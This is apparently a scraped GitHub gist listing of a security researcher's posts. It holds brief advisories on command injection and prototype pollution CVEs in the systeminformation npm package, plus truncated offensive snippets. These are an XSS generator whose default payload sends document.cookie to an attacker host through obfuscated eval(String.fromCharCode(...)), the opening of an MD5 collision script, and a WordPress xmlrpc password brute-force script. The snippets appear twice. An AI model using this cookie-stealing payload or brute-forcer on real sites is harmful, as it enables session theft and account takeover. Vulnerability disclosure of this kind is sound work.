Renan Rocha EffectRenan

## CVE-2020-26274.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                EffectRenan
                / CVE-2020-26274.md
            
            
              Last active Dec 19, 2020
            
              
                [systeminformation] - Command Injection
              
          
      View CVE-2020-26274.md
  
      
    Vulnerability: Command Injection - CVE-2020-26274
Package name: systeminformation.
Tested package versions: 4.31.0.
Fixed package versions: >= 4.31.1.
Description: The attacker can send an OS command into quotation marks and it going to be executed.

  
## CVE-2020-7778, CVE-2020-26245.md

      
              1 file
            
          
              0 forks
            
          
              11 comments
            
          
              0 stars
            
          
                EffectRenan
                / CVE-2020-7778, CVE-2020-26245.md
            
            
              Last active Dec 16, 2020
            
              
                [systeminformation] - Prototype Pollution
              
          
      View CVE-2020-7778, CVE-2020-26245.md
  
      
    Vulnerability: Prototype Pollution - CVE-2020-7778, CVE-2020-26245
Package name: systeminformation.
Tested package versions: 4.30.1, 4.30.2, 4.30.4
Fixed package versions: >= 4.30.5
Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.

  
## CVE-2020-7752.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                EffectRenan
                / CVE-2020-7752.md
            
            
              Last active Nov 12, 2020
            
              
                systeminformation - Command Injection
              
          
      View CVE-2020-7752.md
  
      
    Vulnerability: Command Injection - CVE-2020-7752
References:

Snyk
Mitre Corporation

Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10

  
## eval-charcode.js
function generate(host, com) {
  const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com;
  let encoded = command[0].charCodeAt();

  for (var i = 1; i < command.length; i++) {
      encoded += ',' + command[i].charCodeAt();
  }
  encoded = `eval(String.fromCharCode(${encoded}))`;
  console.log(encoded);
  return encoded;

## MD5-collision.py
# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    global CHARS
    while not stop_event.is_set():

## xmlrpc-bruteforce.sh
#!/bin/bash

if [[ $1 == '' || $2 == '' ]]
then
    echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>"
    exit
fi

USER="admin"
	function generate(host, com) {
	const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com;
	let encoded = command[0].charCodeAt();

	for (var i = 1; i < command.length; i++) {
	encoded += ',' + command[i].charCodeAt();
	}
	encoded = `eval(String.fromCharCode(${encoded}))`;
	console.log(encoded);
	return encoded;
	# -- coding: utf-8 --
	import multiprocessing
	import hashlib
	import random
	import string
	import sys
	CHARS = string.letters + string.digits
	def cmp_md5(substr, stop_event, str_len, start=0, size=20):
	global CHARS
	while not stop_event.is_set():
	#!/bin/bash

	if [[ $1 == '' \|\| $2 == '' ]]
	then
	echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>"
	exit
	fi

	USER="admin"